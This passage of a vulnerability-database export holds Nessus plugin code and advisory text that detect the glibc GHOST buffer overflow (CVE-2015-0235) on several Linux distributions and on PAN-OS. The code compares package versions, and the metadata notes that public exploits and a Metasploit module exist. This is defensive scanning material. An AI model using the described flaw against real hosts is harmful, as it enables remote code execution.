reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:24", "bulletinFamily": "scanner", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)", "modified": "2018-12-28T00:00:00", "id": "SL_20150127_GLIBC_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81037", "published": "2015-01-28T00:00:00", "title": "Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81037);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/12/28 10:10:35\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1501&L=scientific-linux-errata&T=0&P=2696\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74b43985\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:27", "bulletinFamily": "scanner", "description": "The remote host is running a version of Palo Alto Networks PAN-OS equal to or prior to 5.0.15 / 6.0.8 / 6.1.2. It is, therefore, affected by a heap-based buffer overflow in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "modified": "2018-07-24T00:00:00", "id": "PALO_ALTO_PAN-SA-2015-0002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81167", "published": "2015-02-04T00:00:00", "title": "Palo Alto Networks PAN-OS <= 5.0.15 / 6.0.x <= 6.0.8 / 6.1.x <= 6.1.2 GNU C Library (glibc) Buffer Overflow (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81167);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/24 18:56:13\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Palo Alto Networks PAN-OS <= 5.0.15 / 6.0.x <= 6.0.8 / 6.1.x <= 6.1.2 GNU C Library (glibc) Buffer Overflow (GHOST)\");\n script_summary(english:\"Checks the PAN-OS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Palo Alto Networks PAN-OS\nequal to or prior to 5.0.15 / 6.0.8 / 6.1.2. It is, therefore,\naffected by a heap-based buffer overflow in the GNU C Library (glibc)\ndue to improperly validating user-supplied input in the glibc\nfunctions __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2(). This allows a remote attacker to cause a buffer\noverflow, resulting in a denial of service condition or the execution\nof arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/29\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"The vendor has not yet provided a patch at this time (2015/03/10).\n\nPlease contact the vendor regarding a patch or workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:paloaltonetworks:pan-os\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Palo Alto Local Security Checks\");\n\n script_dependencies(\"palo_alto_version.nbin\");\n script_require_keys(\"Host/Palo_Alto/Firewall/Version\", \"Host/Palo_Alto/Firewall/Full_Version\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Palo Alto Networks PAN-OS\";\nversion = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Version\");\nfull_version = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Full_Version\");\nfix = NULL;\n\n# Ensure sufficient granularity.\nif (\n version =~ \"^5(\\.0)?$\" ||\n version =~ \"^6(\\.[01])?$\"\n) audit(AUDIT_VER_NOT_GRANULAR, app_name, full_version);\n\nif (version =~ \"^6\\.1\\.\")\n cutoff = \"6.1.2\";\nelse if (version =~ \"^6\\.0\\.\")\n cutoff = \"6.0.8\";\nelse if (\n version =~ \"^[0-4]($|[^0-9])\" ||\n version =~ \"^5\\.0\\.\"\n)\n cutoff = \"5.0.15\";\nelse\n audit(AUDIT_NOT_INST, app_name + \" 0.x-4.x / 5.0.x / 6.0.x / 6.1.x\");\n\n# Compare version to fix and report as needed.\nif (ver_compare(ver:version, fix:cutoff, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + full_version +\n '\\n Fixed versions : See solution.' +\n '\\n';\n security_hole(extra:report, port:0);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, full_version);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:25", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2015:0101 :\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2015-0101.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81099", "published": "2015-01-30T00:00:00", "title": "Oracle Linux 4 : glibc (ELSA-2015-0101) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0101 and \n# Oracle Linux Security Advisory ELSA-2015-0101 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81099);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/18 17:43:57\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0101\");\n\n script_name(english:\"Oracle Linux 4 : glibc (ELSA-2015-0101) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0101 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004827.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"glibc-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-common-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-devel-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-headers-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-profile-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-utils-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nptl-devel-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nscd-2.3.4-2.57.0.1.el4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:23", "bulletinFamily": "scanner", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call to either of these functions can use this flaw to execute arbitrary code with the permissions of the user running the application.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with new glibc packages that fix CVE-2015-0235 .\n\nFor 2014.09 Amazon Linux AMIs, 'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, the same 'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 repositories, 'glibc-2.12-1.149.49.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.03, 2012.09, 2012.03, or 2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.09 update glibc' to install the updated glibc package. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.", "modified": "2018-06-27T00:00:00", "id": "ALA_ALAS-2015-473.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81024", "published": "2015-01-27T00:00:00", "title": "Amazon Linux AMI : glibc (ALAS-2015-473)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-473.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81024);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:24\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"ALAS\", value:\"2015-473\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2015-473)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call to either of these functions\ncan use this flaw to execute arbitrary code with the permissions of\nthe user running the application.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have\nbackfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with\nnew glibc packages that fix CVE-2015-0235 .\n\nFor 2014.09 Amazon Linux AMIs, 'glibc-2.17-55.93.amzn1' addresses the\nCVE. Running 'yum clean all' followed by 'yum update glibc' will\ninstall the fixed package, and you should reboot your instance after\ninstalling the update.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, the same\n'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all'\nfollowed by 'yum update glibc' will install the fixed package, and you\nshould reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 repositories,\n'glibc-2.12-1.149.49.amzn1' addresses the CVE. Running 'yum clean all'\nfollowed by 'yum update glibc' will install the fixed package, and you\nshould reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.03, 2012.09, 2012.03, or\n2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.09 update glibc' to install the updated glibc\npackage. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a\nversion of the Amazon Linux AMI that was part of our public beta, and\nwe encourage you to move to a newer version of the Amazon Linux AMI as\nsoon as possible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-473.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update glibc' to update your system. Note that you may need\nto run 'yum clean all' first. Once this update has been applied,\n'reboot your instance to ensure that all processes and daemons that\nlink against glibc are using the updated version'. On new instance\nlaunches, you should still reboot after cloud-init has automatically\napplied this update.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\n# Checks for below glibc-2.17\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.17-0.0.amzn1\"))\n{\n # Clean out initial report from first check\n __rpm_report = '';\n if (rpm_check(release:\"ALA\", reference:\"glibc-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-common-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-static-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"nscd-2.12-1.149.49.amzn1\")) flag++;\n}\nelse\n{\n # Checks for glibc-2.17\n # Clean out initial report from first check\n __rpm_report = '';\n if (rpm_check(release:\"ALA\", reference:\"glibc-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-common-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-static-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"nscd-2.17-55.93.amzn1\")) flag++;\n}\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 